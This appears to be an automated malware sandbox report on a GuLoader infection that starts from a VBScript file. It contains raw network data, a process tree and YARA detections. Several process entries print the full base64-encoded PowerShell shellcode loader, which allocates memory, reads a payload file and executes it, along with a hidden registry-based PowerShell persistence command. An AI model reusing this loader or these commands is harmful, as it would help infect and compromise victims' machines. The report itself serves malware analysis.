                          Nov 25, 2021 11:28:24.934134007 CET1441INData Raw: 25 3d 03 f3 6c e8 67 a9 2b 74 a1 e5 ef 6e 17 f8 0a 51 de a3 83 59 90 0f 2f d2 eb a3 d4 85 56 07 43 59 9a b0 6a 44 c4 a7 fd 55 3d 0d c7 e2 d2 b9 8d 2e 8d ff aa bb 2d 7f fc 0a 31 02 3b a1 85 5e 5b 60 03 3d 17 39 8b 9e 68 53 53 e8 d8 12 37 50 70 0c
                          Data Ascii: %=lg+tnQY/VCYjDU=.-1;^[`=9hSS7Pp]%H@yH78GHru%ta6Fpa!^4cR2<r(k]V!T!6]iMj":Ec88O)>Qt|6(y7hK#&
                          Nov 25, 2021 11:28:24.934180975 CET1442INData Raw: a2 65 58 11 d2 04 15 ec 13 d1 f4 7d bf 58 7a 01 0e ea 10 30 d1 ea 7d b8 a0 ce af 2d ad 34 65 23 c1 f0 30 8c 2c e2 0c 43 d6 59 5e 7c 52 53 29 ce f2 d0 57 9b d7 38 79 d9 2a 9f e1 72 eb 6e 5e 24 4d 06 03 83 89 2f 38 aa 7e bc 2b a3 7d 0e b7 6b 17 e2
                          Data Ascii: eX}Xz0}-4e#0,CY^|RS)W8y*rn^$M/8~+}kbe}~z^' LO^7Y"yRz]:Q0X$#rkbvc*3'40I`qj)-|<(,+Iau
                          Nov 25, 2021 11:28:24.934226990 CET1443INData Raw: ff 10 a3 f5 5a 1e 35 90 49 37 60 d8 11 48 1a e0 87 01 34 74 b2 ad 30 eb a3 96 86 59 b1 9c 9b e0 b6 3a fd cd e8 66 7c 61 62 9b 39 de 30 7b 77 de 14 c9 0e 86 56 47 ec 46 ab 7a ab ba 60 c5 77 4d 2f 31 b4 74 b4 71 d0 9f 9a da 1a bf 6c 03 db 55 38 5a
                          Data Ascii: Z5I7`H4t0Y:f|ab90{wVGFz`wM/1tqlU8Z`sDi6*5LrXp!evw&lkx<(6Y<r* OLH^:vc,?B!whMf\?kmAS$J#)


                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Start time:11:25:30
                          Start date:25/11/2021
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs"
                          Imagebase:0x7ff705490000
                          File size:170496 bytes
                          MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:11:25:35
                          Start date:25/11/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA=
                          Imagebase:0xf70000
                          File size:433152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.15295840627.0000000009B70000.00000040.00000001.sdmp, Author: Joe Security
                          Reputation:low

                          General

                          Start time:11:25:35
                          Start date:25/11/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff675b50000
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:11:25:55
                          Start date:25/11/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline
                          Imagebase:0xdd0000
                          File size:2141552 bytes
                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:low

                          General

                          Start time:11:25:56
                          Start date:25/11/2021
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP"
                          Imagebase:0x9b0000
                          File size:46832 bytes
                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Start time:11:26:17
                          Start date:25/11/2021
                          Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                          Imagebase:0xca0000
                          File size:480256 bytes
                          MD5 hash:7871873BABCEA94FBA13900B561C7C55
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.15018322075.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                          Reputation:moderate

                          General

                          Start time:11:26:43
                          Start date:25/11/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
                          Imagebase:0xf70000
                          File size:433152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:low

                          General

                          Start time:11:26:43
                          Start date:25/11/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff675b50000
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:11:26:51
                          Start date:25/11/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
                          Imagebase:0xf70000
                          File size:433152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:low

                          General

                          Start time:11:26:51
                          Start date:25/11/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff675b50000
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:11:26:53
                          Start date:25/11/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFA